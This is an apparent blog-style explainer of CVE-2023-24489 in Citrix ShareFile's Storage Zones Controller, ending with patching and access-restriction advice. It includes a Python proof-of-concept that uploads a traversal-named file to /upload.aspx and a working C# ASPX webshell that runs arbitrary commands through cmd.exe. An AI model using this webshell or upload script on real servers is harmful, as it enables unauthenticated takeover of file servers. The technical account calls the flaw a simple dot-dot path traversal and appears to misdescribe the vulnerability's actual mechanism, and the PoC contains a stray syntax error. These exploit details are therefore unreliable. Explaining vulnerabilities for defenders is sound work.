CVE-2023-24489 - Remote Compromise of Citrix ShareFile Storage Zones Controller

In 2023, researchers uncovered a serious vulnerability — CVE-2023-24489 — in Citrix ShareFile’s customer-managed Storage Zones Controller. Left unpatched, this bug lets attackers gain control of the affected environment without authentication. Here's a deep dive, using simple language, on how this flaw works, how attackers exploit it, and what you should do.

What is ShareFile Storage Zones Controller?

Citrix ShareFile is a popular cloud-based file storage and sharing solution for businesses. For security or compliance, some organizations deploy a self-managed "Storage Zones Controller" (SZC) on their own servers, rather than the cloud.

This Storage Zones Controller exposes a web interface for managing files and zones.

What is CVE-2023-24489?

CVE-2023-24489 is a critical path traversal vulnerability found in the ShareFile Storage Zones Controller. It allows remote, unauthenticated attackers to read and write files in the application’s directories, ultimately leading to remote code execution (RCE) as *SYSTEM* on the server.

In plain talk: Someone from the Internet can take over your ShareFile server.

How Does the Attack Work?

At the core is improper handling of user-supplied pathnames. The upload handler of ShareFile's SZC (exposed at /upload.aspx) doesn't properly filter out dangerous file paths like .. (dot-dot), letting attackers step outside intended folders.

Send a Post Request

The attacker crafts a POST request to /upload.aspx with a malicious file path such as ..\web.config.  

Proof-of-Concept (PoC) Code

Below is a simplified Python script that demonstrates the vulnerability.

import requests

TARGET = "https://victim-server.com";
UPLOAD_PATH = "/upload.aspx"
# Overwrite web.config or upload webshell as ../../../webroot/webshell.aspx for example

files = {
    'file': ('../web.config', open('malicious_web.config', 'rb'), 'application/xml')
}

response = requests.post(f"{TARGET}{UPLOAD_PATH}", files=files)
print('Status:', response.status_code)
print('Response:', response.text)

If successful, this could replace the server's configuration, or allow uploading a backdoor webshell like:

<%@ Page Language="C#" %>
<% if (Request["cmd"]!=null) { 
    System.Diagnostics.Process.Start("cmd.exe", "/c "+Request["cmd"]);
} %>

Accessing https://victim-server.com/webshell.aspx?cmd=whoami would return the server’s username.

Vulnerable Versions:

All Storage Zones Controllers prior to version 5.11.24 are vulnerable. (Source)

Attack Surface:

Anywhere /upload.aspx is reachable from the Internet — so edge SZC deployments are at highest risk.

References & Reports

- Citrix Security Alert on CVE-2023-24489
- NVD entry for CVE-2023-24489
- Assetnote Original Exploit Writeup

Upgrade Immediately:

Citrix released version 5.11.24 to address this vulnerability. Upgrade all Storage Zones Controllers.

Block Internet Access:

Restrict SZC management portal and upload endpoints like /upload.aspx to trusted IPs.

In Summary

CVE-2023-24489 is a major security issue; if you run a customer-managed ShareFile Storage Zones Controller and haven’t patched since June 2023, attackers might take remote control of your fileserver. Act now: update your software, review your logs, and lock down your deployments.

This is a wake-up call for everyone using on-premises cloud services: keep them patched, and don’t expose admin interfaces to the open Internet!

Timeline

Published on: 07/10/2023 22:15:00 UTC
Last modified on: 07/18/2023 18:19:00 UTC